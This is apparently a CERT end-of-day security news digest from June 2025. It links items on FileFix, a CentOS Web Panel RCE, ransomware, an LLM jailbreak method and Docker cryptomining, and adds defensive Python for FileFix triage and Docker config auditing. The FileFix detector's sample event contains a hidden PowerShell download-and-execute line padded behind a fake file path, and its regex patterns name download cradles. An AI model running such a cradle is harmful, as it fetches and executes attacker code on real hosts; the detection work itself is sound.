End-of-Day report
Timeframe: Monday 23-06-2025 18:00 - Tuesday 24-06-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
News
Effects of the military conflict between Israel and Iran on Austria
Available analyses from international authorities and security companies have recorded increased activity by threat actors on all sides since the start of the current military confrontation between Israel and Iran. [..] Based on our observations so far, there have not yet been any direct attacks on, or consequences for, local companies or organisations.
https://www.cert.at/de/aktuelles/2025/6/auswirkungen
FileFix attack weaponizes Windows File Explorer for stealthy commands
A cybersecurity researcher has developed FileFix, a variant of the ClickFix social engineering attack that tricks users into executing malicious commands via the File Explorer address bar in Windows.
https://www.bleepingcomputer.com/news/security/filefix-attack-weaponizes-windows-file-explorer-for-stealthy-powershell-commands/
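A FileFix lure ends with explorer.exe launching a command interpreter with the pasted payload. The following triage function is an added example written for this report, not code from the article or from the researcher who described the technique; the marker heuristics, the Sysmon-style field names and the sample events are the editor's own constructed assumptions, not real telemetry.

```python
"""Flag process-creation events in which explorer.exe spawns a command interpreter
with a command line that looks like a pasted FileFix/ClickFix payload.
Added example for this report; heuristics and sample events are constructed."""
import re

# Interpreters such lures typically invoke (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Markers common in pasted one-liners: hidden windows, encoded commands,
# download cradles, and long runs of spaces that push the real command out of
# view behind a fake file path in the address bar (assumption).
SUSPICIOUS = [
    re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"(?:iwr|invoke-webrequest|downloadstring|invoke-expression|\biex\b|curl\s+http)", re.I),
    re.compile(r" {8,}"),  # padding used to hide the payload
]


def is_filefix_candidate(event: dict) -> bool:
    """True for an explorer.exe -> interpreter spawn whose command line carries
    at least one suspicious marker. Keys follow Sysmon event ID 1 naming."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return False
    cmdline = event.get("CommandLine", "")
    return any(p.search(cmdline) for p in SUSPICIOUS)


def triage(events):
    """Return only the events worth an analyst's attention."""
    return [e for e in events if is_filefix_candidate(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: user opened PowerShell from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    },
    {   # FileFix-style: hidden window, download cradle, padded fake path
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -c "iwr http://198.51.100.7/p.ps1|iex"'
                       + " " * 40 + r"# C:\company\internal\Secure File\Report.pdf",
    },
    {   # benign: cmd.exe launched by a service host, not by explorer.exe
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c dir",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("FileFix candidate:", hit["CommandLine"][:80])
```

explorer.exe legitimately starts interpreters whenever a user launches them from the shell, so the parent/child pair alone is not a detection; the markers on the command line carry the signal, and the padding check in particular should be tuned against your own baseline before alerting.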
Police mobile phones unusable since cyberattack
An attack on the service phones of the police in Mecklenburg-Vorpommern could have greater consequences than assumed. The phones are currently not in use.
https://heise.de/-10456563
BSI warns: fewer and fewer people use 2FA and secure passwords
A new study by the BSI shows a worrying trend. Despite the high threat level, people are behaving increasingly carelessly online.
https://www.golem.de/news/bsi-warnt-immer-weniger-menschen-nutzen-2fa-und-sichere-passwoerter-2506-197389.html
Remote code execution in CentOS Web Panel - CVE-2025-48703
This exploitation scenario was tested on versions 0.9.8.1204 and 0.9.8.1188 on CentOS 7 and reported to the CWP developers on 13 May 2025 as CVE-2025-48703. It allows a remote attacker who knows a valid username on a CWP instance to execute arbitrary commands on the server without authenticating. The vulnerability was patched in the latest version, 0.9.8.1205, in June 2025.
https://fenrisk.com/rce-centos-webpanel
The State of Ransomware 2025
Explore the causes and consequences of ransomware in 2025 based on findings from a vendor-agnostic survey of 3,400 organizations hit by ransomware in the last year.
https://news.sophos.com/en-us/2025/06/24/the-state-of-ransomware-2025/
Echo Chamber Jailbreak Tricks LLMs Like OpenAI and Google into Generating Harmful Content
Cybersecurity researchers are calling attention to a new jailbreaking method called Echo Chamber that could be leveraged to trick popular large language models (LLMs) into generating undesirable responses, irrespective of the safeguards put in place.
https://thehackernews.com/2025/06/echo-chamber-jailbreak-tricks-llms-like.html
Hackers Exploit Misconfigured Docker APIs to Mine Cryptocurrency via Tor Network
Misconfigured Docker instances are the target of a campaign that employs the Tor anonymity network to stealthily mine cryptocurrency in susceptible environments.
https://thehackernews.com/2025/06/hackers-exploit-misconfigured-docker.html
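The misconfiguration behind this campaign is a Docker daemon API reachable over TCP without TLS client authentication. The audit function below is an added example for this report, not code from the article or from the Docker project; it reads the documented daemon.json keys (hosts, tls, tlsverify) and the weak and hardened configurations it checks are constructed by the editor.

```python
"""Audit a Docker daemon.json for an API listener exposed over TCP without
mutual TLS. Added example for this report; sample configurations are constructed."""
import json
from urllib.parse import urlparse


def audit_daemon_config(raw: str) -> list[str]:
    """Return a list of findings for a daemon.json document (empty if clean)."""
    cfg = json.loads(raw)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if urlparse(h).scheme == "tcp"]
    if not tcp_hosts:
        return findings  # unix socket (or fd://) only: the API is not on the network
    for h in tcp_hosts:
        bind = urlparse(h).hostname or ""
        if bind in ("", "0.0.0.0", "::"):
            findings.append(f"{h}: bound to all interfaces")
    if not cfg.get("tls") and not cfg.get("tlsverify"):
        findings.append("tcp listener without tls/tlsverify: anyone who can reach the "
                        "port controls the daemon and, through it, the host")
    elif not cfg.get("tlsverify"):
        findings.append("tls without tlsverify: the server is authenticated but "
                        "clients are not")
    return findings


# Constructed weak configuration: plaintext API on every interface.
WEAK = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed hardened configuration: specific address, mutual TLS required.
# Certificate paths are placeholders (assumption).
HARDENED = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

if __name__ == "__main__":
    for name, doc in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_daemon_config(doc) or "no findings")
```

Binding to a private address and requiring client certificates is the minimum; a network-level restriction on the port is still advisable. On systemd-based installations note that setting "hosts" in daemon.json conflicts with the `-H fd://` argument in the stock unit file and the daemon will refuse to start until one of the two is removed.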
A Deep Dive into a Modular Malware Family
In today's blog post we highlighted an interesting malware family targeting various systems with diverse capabilities, including stealing credit card information and WordPress credentials. Additionally, we detailed a novel bundle of credit card skimmers and malicious WordPress plugins which combines malicious actions with features developed for the attacker's convenience.
https://www.wordfence.com/blog/2025/06/a-deep-dive-into-a-modular-malware-family/
Vulnerabilities
Splunk Security Advisories 2025-06-23
Splunk released 4 security advisories (1x critical).
https://advisory.splunk.com//advisories
Security updates for Tuesday
Security updates have been issued by Debian (dns-root-data and xorg-server), Fedora (glibc, mingw-glib2, and optipng), Red Hat (iputils, kernel, kernel-rt, krb5, libarchive, mod_auth_openidc, mod_proxy_cluster, and xorg-x11-server-Xwayland), SUSE (python313), and Ubuntu (fig2dev, gnuplot, gss-ntlmssp, linux, linux-gcp, linux-gke, linux-gkeop, linux-ibm, linux-kvm, linux-lowlatency, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-igx, linux-oracle, linux-aws-5.15, linux-gcp-5.15, linux-ibm-5.15, linux-lowlatency-hwe-5.15, linux-oracle-5.15, linux-aws-fips, linux-fips, linux-gcp-fips, linux-hwe-5.15, linux-intel-iot-realtime, and linux-realtime).
https://lwn.net/Articles/1026646/
Kanboard: security vulnerability enables account takeover
In the open-source Kanban tool Kanboard, attackers can forge links that lead to account takeover. [..] The Kanboard developers provide updated sources and also Docker containers; they link to them in the release notes and discuss the Docker update.
https://heise.de/-10457116
Mozilla Firefox June 24, 2025
https://www.mozilla.org/en-US/security/advisories/
f5: K000151924: runc vulnerability CVE-2024-45310
https://my.f5.com/manage/s/article/K000151924
Case update: DIVD-2025-00032 - Unauthenticated Arbitrary Remote Code Execution in Pterodactyl
https://csirt.divd.nl/cases/DIVD-2025-00032/